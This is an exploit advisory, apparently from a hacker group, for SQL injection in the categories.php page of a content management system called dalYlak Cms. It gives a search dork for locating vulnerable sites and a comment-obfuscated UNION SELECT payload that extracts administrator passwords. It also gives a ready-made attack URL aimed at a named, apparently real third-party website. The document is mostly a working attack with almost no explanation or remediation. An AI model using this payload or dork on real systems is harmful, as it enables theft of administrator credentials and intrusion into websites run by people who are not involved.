#(+) Exploit Title: dalYlak Cms SQLInjection Vulnerability
#(+) Author : Net.Edit0r
#(+) Data  : 2011-04-26
#(+) E-mail : Black.Hat.tm@gmail.com
#(+) Home : http://security-war.com and Black-hg.com
#(+) dork : "Powred by dalYlak.com"
#(+) Versian : All Ver
#(+) Category : Web Apps [SQl]
#(+) Platform : Tested on: linux
#(+) Download : http://www.dalYlak.com/

____________________________________________________________________
                                            Black Hat Group #BHG
____________________________________________________________________


The security problem in the file "categories.php" has been created.

[~] Vulnerable File :

# [+]http://localhost/categories.php?act=show&id=[SQL]

[~] SQL injection Vulnerability

# [+]-1+/**/+UNION+/**/+SELECT+/**/+passwd+/**/+FrOm+/**/+admin--

[+]http://www.localhost/categories.php?act=show&id=-1+/**/+UNION+/**/+SELECT+/**/+passwd+/**/+FrOm+/**/+admin--

[~] Demo :

[+] http://www.arabiskco.com/pro/categories.php?act=show&id=-1+/**/+UNION+/**/+SELECT+/**/+passwd+/**/+FrOm+/**/+admin--

##########################
(+)IRANIAN Young HackerZ # Persian Gulf 4 Ever
##########################
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & Mr.Xhat & Amir-MagiC & D3adly #BHG
##########################
(+)Gr33ts to : Ajaxtm.com ~ Mn-team.net All Iranian HackerZ
##########################